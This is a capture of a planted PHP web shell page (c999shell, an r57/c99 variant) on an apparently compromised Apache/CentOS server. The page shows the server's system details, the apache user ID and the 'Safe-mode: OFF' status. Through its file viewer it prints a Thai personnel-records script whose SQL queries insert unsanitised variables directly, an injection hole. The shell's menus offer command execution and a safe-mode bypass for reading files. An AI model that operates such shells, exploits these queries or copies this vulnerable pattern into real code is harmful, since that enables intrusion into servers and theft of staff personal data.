Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/director/ drwxr-xr-x |
Viewing file: ShowPersonalDetail.php (17.73 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <?php session_start(); /** Define Validate Access */ define( '_VALID_ACCESS', 1 ); /** Check Session User Login */ if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) { echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>"; echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />"; exit(); } else { /** Configuration */ include( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); /** Create Database Object */ $dbObj = new DBConn; /** Config Table for This Page */ $myTable = "personal_tb"; $myTable1 = "research_char_tb"; $myTable2 = "degree_his_tb"; $myTableFK = "Teacher_code"; $query = " SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE Teacher_code='$Teacher_code' "; $result = $dbObj->execQuery($query); $rs = $dbObj->fetchArray($result); /** โฟลเดอร์ไฟล์เอกสาร */ $doc_path = $_Config_live_site."/personal_pic"; } # else ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> <title><?=$_Config_sitename;?> - ข้อมูลบุคลากร - รายละเอียดบุคลากร</title> <script type="text/javascript" src="../js/utilities.js"></script> <link href="../css/default.css" rel="stylesheet" type="text/css" /> </head> <body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0"> <?php include( "../templates/incHeader.php" ); ?> <table width="1003" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="215" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td> <td width="788" height="300" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset><table width="770" border="0" cellspacing="0" cellpadding="0"> <form id="myForm" name="myForm" method="post" action=""> <tr> <td height="5"></td> </tr> <tr> <td height="30" background="../images/background/bg-head-topic-w780.gif"><span class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>» <a href="PersonalData.php">ข้อมูลบุคลากร</a> » <span class="NOTE">รายละเอียดบุคลากร</span></strong></span></td> </tr> <tr> <td> </td> </tr> <tr> <td align="center" valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="76%"><table width="100%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#E4E4E4"> <tr bordercolor="#E7FAFE"> <td height="20" align="right" bordercolor="#FFFFFF" bgcolor="#FFFFFF">สังกัด ภาค/ฝ่าย</td> <td bgcolor="#FFFFFF">:</td> <td bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php $sql = " SELECT * FROM faculty_tb WHERE Faculty_code='$rs[Faculty_code]' "; $result1 = $dbObj->execQuery($sql); $rs1 = $dbObj->fetchArray($result1); $dbObj->freeresult($result1); echo $rs1['Faculty_name']; ?></td> </tr> <tr bordercolor="#E7FAFE"> <td height="20" align="right" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ชื่อ-นามสกุล</td> <td width="4" bgcolor="#FFFFFF">:</td> <td width="394" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?=$rs['First_name'];?><?=$rs['Teacher_name'];?> <?=$rs['Teacher_lastname'];?></td> </tr> <tr bordercolor="#E7FAFE"> <td width="148" height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ประเภทสายงาน</td> <td nowrap="nowrap" bgcolor="#FFFFFF">:</td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php $Teacher_type = $rs['Teacher_type']; $sql = " SELECT * FROM teacher_type_tb WHERE Ttype_code='$Teacher_type' "; $result2 = $dbObj->execQuery($sql); $rs2 = $dbObj->fetchArray($result2); $dbObj->freeresult($result2); echo $rs2['Ttype_name']; ?></td> </tr> <tr bordercolor="#FFFFFF"> <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ตำแหน่งการบริหาร</td> <td width="4" nowrap="nowrap" bgcolor="#FFFFFF">:</td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php echo $rs['Manage_pos']; ?></td> </tr> <tr bordercolor="#FFFFFF"> <td height="24" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">สถานะบุคลากร</td> <td width="4" nowrap="nowrap" bgcolor="#FFFFFF">:</td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php $Person_type = $rs['Person_type']; $sql = " SELECT * FROM person_type_tb WHERE Ptype_code='$Person_type' "; $result3 = $dbObj->execQuery($sql); $rs3 = $dbObj->fetchArray($result3); $dbObj->freeresult($result3); echo $rs3['Ptype_name']; ?></td> </tr> <tr bordercolor="#E7FAFE"> <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ความเชี่ยวชาญ</td> <td nowrap="nowrap" bgcolor="#FFFFFF">:</td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php echo htmlspecialchars_decode( nl2br( $rs['Propessnal'] ) ); ?></td> </tr> <tr bordercolor="#E7FAFE"> <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">ความสามารถพิเศษ</td> <td nowrap="nowrap" bgcolor="#FFFFFF">:</td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php echo htmlspecialchars_decode( nl2br( $rs['Skill'] ) ); ?></td> </tr> <tr bordercolor="#E7FAFE"> <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">E-mail</td> <td nowrap="nowrap" bgcolor="#FFFFFF">:</td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10"><?php echo $rs["Email"] ;?></font></td> </tr> <tr bordercolor="#E7FAFE"> <td height="20" colspan="3" align="left" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF">วุฒิการศึกษา</td> </tr> <tr bordercolor="#E7FAFE"> <td height="20" colspan="3" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"><table width="99%" border="0" align="left" cellpadding="1" cellspacing="0" bgcolor="#FFFFFF" style="background-color:#eeeeee; border:0px solid gray"> <?php $query5 = " SELECT * FROM $myTable2 WHERE Teacher_code='$Teacher_code' "; $result5 = $dbObj->execQuery($query5); $numrows = $dbObj->_numrows; ?> <?php $no = 1+($display-1)*$limit; while( $rss = $dbObj->fetchArray($result5) ) { $bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF"; ?> <tr bgcolor="<?=$bgColor;?>"> <td width="16%" height="20" align="left"><img src="../images/icons/linesub.gif" width="16" height="16" border="0" align="absmiddle" /> <?php $Degree_code = $rss['Degree_code'] ; $sql11 = " Select Degree_name From degree_tb Where Degree_code='$Degree_code' "; $result11 = mysql_query($sql11); $rs11 = mysql_fetch_array($result11); echo"$rs11[Degree_name] "; ?></td> <td width="76%" align="left" class="PADDING-LEFT-5"><? echo $rss['Degree_His'] ; ?> สาขา</font></a><font color="#000000" size="2" face="Tahoma"><? echo $rss['Degree_Major']?></font></td> <td width="8%" align="left" class="PADDING-LEFT-5"><font color="#000000" size="2" face="Tahoma"><? echo $rss[Degree_Year]?></font></td> </tr> <?php //$no++; } # while ?> </table></td> </tr> <?php if( $rs['Degree_His2'] != "" ) { ?> <?php } #if if( $rs['Degree_His3'] != "" ) { ?> <tr bordercolor="#E7FAFE"> <td height="20" colspan="3" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF"> </td> </tr> <?php } #if ?> <tr bordercolor="#E7FAFE"> <td height="20" align="right" valign="top" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF" class="PADDING-TOP-5">ภาระงาน</td> <td nowrap="nowrap" bgcolor="#FFFFFF"> </td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10 PADDING-TOP-5"><table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="71%" align="left">• <?php $sql = " SELECT * FROM training_tb WHERE Teacher_code='$rs[Teacher_code]' "; $result6 = $dbObj->execQuery($sql); $numTraining = $dbObj->_numrows; $dbObj->freeresult($result6); if( $numTraining > 0 ) { ?>ประวัติการพัฒนาตนเอง</a><?php } else { ?>ประวัติการพัฒนาตนเอง<?php } ?></td> <td width="29%" align="center"><?php echo $numTraining; ?> ระเบียน</td> </tr> <tr> <?php $query = " SELECT * FROM training_tb WHERE Teacher_code='$Teacher_code' Group By Year_std"; $result6 = $dbObj->execQuery($query); $numrows = $dbObj->_numrows; ?> <?php $no = 1+($display-1)*$limit; while( $rs6 = $dbObj->fetchArray($result6) ) { $bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF"; ?> <tr bgcolor="<?=$bgColor;?>"> <td align="left"><img src="../images/icons/linesub.gif" width="16" height="16" border="0" align="absmiddle" />ปีงบประมาณ</a><a href="showTrainingList.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>&Year_std=<?=$rs6['Year_std'];?>" > <?php echo $rs6['Year_std']; ?></td> <td align="center"><?php $sql = " SELECT * FROM training_tb WHERE Teacher_code='$Teacher_code' And Year_std='$rs6[Year_std]' "; $result7 = $dbObj->execQuery($sql); $numTraining = $dbObj->_numrows; $dbObj->freeresult($result7); ?> <?php echo $numTraining; ?></td> </tr> <?php //$no++; } # while ?> <tr> <td align="left">• <?php $sql = " SELECT * FROM $myTable1 WHERE Teacher_code='$rs[Teacher_code]' "; $result7 = $dbObj->execQuery($sql); $numResearch = $dbObj->_numrows; $dbObj->freeresult($result7); if( $numResearch > 0 ) { ?><a href="ResearchList.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">งานวิจัย</a><?php } else { ?>งานวิจัย<?php } ?></td> <td align="center"><?php echo $numResearch; ?> ระเบียน</td> </tr> <tr> <td align="left">• <?php $sql = " SELECT * FROM edu_product_tb WHERE Teacher_code='$rs[Teacher_code]' "; $result8 = $dbObj->execQuery($sql); $numEduProduct = $dbObj->_numrows; $dbObj->freeresult($result8); if( $numEduProduct > 0 ) { ?><a href="ShowProductionMe.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">ผลงานวิชาการ</a><?php } else { ?>ผลงานวิชาการ<?php } ?></td> <td align="center"><?php echo $numEduProduct; ?> ระเบียน</td> </tr> <tr> <td align="left">• <?php $sql = " SELECT * FROM committee_tb WHERE Teacher_code='$rs[Teacher_code]' "; $result9 = $dbObj->execQuery($sql); $numCommittee = $dbObj->_numrows; $dbObj->freeresult($result9); if( $numCommittee > 0 ) { ?><a href="CommitByYearDetail.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">งานบริการวิชาการ</a><?php } else { ?>งานบริการวิชาการ<?php } ?></td> <td align="center"><?php echo $numCommittee; ?> ระเบียน</td> </tr> <tr> <td align="left">• <?php $sql = " SELECT * FROM tech_plan_tb WHERE Teacher_code='$rs[Teacher_code]' "; $result10 = $dbObj->execQuery($sql); $numTechPlan = $dbObj->_numrows; $dbObj->freeresult($result10); if( $numTechPlan > 0 ) { ?> <a href="PlanList.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>">แผนการสอนรายวิชา</a><?php } else { ?>แผนการสอนรายวิชา<?php } ?></td> <td align="center"><?php echo $numTechPlan; ?> ระเบียน</td> </tr> <?php $query = " SELECT * FROM tech_plan_tb WHERE Teacher_code='$Teacher_code' Group By acadYear"; $result8 = $dbObj->execQuery($query); $numrows = $dbObj->_numrows; ?> <?php $no = 1+($display-1)*$limit; while( $rs8 = $dbObj->fetchArray($result8) ) { $bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF"; ?> <tr bgcolor="<?=$bgColor;?>"> <td align="left"><img src="../images/icons/linesub.gif" width="16" height="16" border="0" align="absmiddle" />ปีการศึกษา<a href="acadYearPlan.php?Teacher_code=<?php echo $rs['Teacher_code']; ?>&acadYear=<?=$rs8['acadYear'];?>" > <?php echo $rs8['acadYear']; ?></td> <td align="center"><?php $sql = " SELECT * FROM tech_plan_tb WHERE Teacher_code='$Teacher_code' And acadYear='$rs8[acadYear]' "; $result9 = $dbObj->execQuery($sql); $numYear = $dbObj->_numrows; $dbObj->freeresult($result9); ?> <?php echo $numYear; ?> วิชา</td> </tr> <?php //$no++; } # while ?> <tr> <td align="left">• <a href="/mis/eregis/showTimeTableT.php?programId=&studentYear=&acadYear=2552&coId=&ttClId=&ttRmId=&ttEpMepId=&ttEpSepId=&ttOfId=<?=$rs['officerId1'];?>&ttWdAcYWeekNo=&view=t">ตารางสอนนักศึกษา</a></td> <td align="center"> </td> </tr> <tr> <td align="left">• <a href="StdAdviceList.php?officerId1=<?=$rs['officerId1'];?>">นักศึกษาในความรับผิดชอบที่ปรึกษา</a></td> <td align="center"> </td> </tr> </table></td> </tr> <tr bordercolor="#E7FAFE"> <td height="20" align="right" nowrap="nowrap" bordercolor="#FFFFFF" bgcolor="#FFFFFF" class="PADDING-TOP-5"> </td> <td nowrap="nowrap" bgcolor="#FFFFFF"> </td> <td nowrap="nowrap" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10 PADDING-TOP-5"> </td> </tr> </table> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> </td> </tr> <tr> <td align="center"><input type="button" name="button" id="button" value="« ย้อนกลับ" class="CURSOR-HAND" onclick="window.history.back();" /></td> </tr> </table></td> <td width="24%" valign="top" align="center"><table width="150" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="<?=$doc_path;?>/<?php echo $rs['Img1']; ?>" width="150" height="170" /></td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td> </td> </tr></form> </table> </fieldset></td> </tr> </table> <?php include( "../templates/incFooter.php" ); ?> </body> </html> <?php /** Free Resource */ $dbObj->freeresult($result); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0065 ]-- |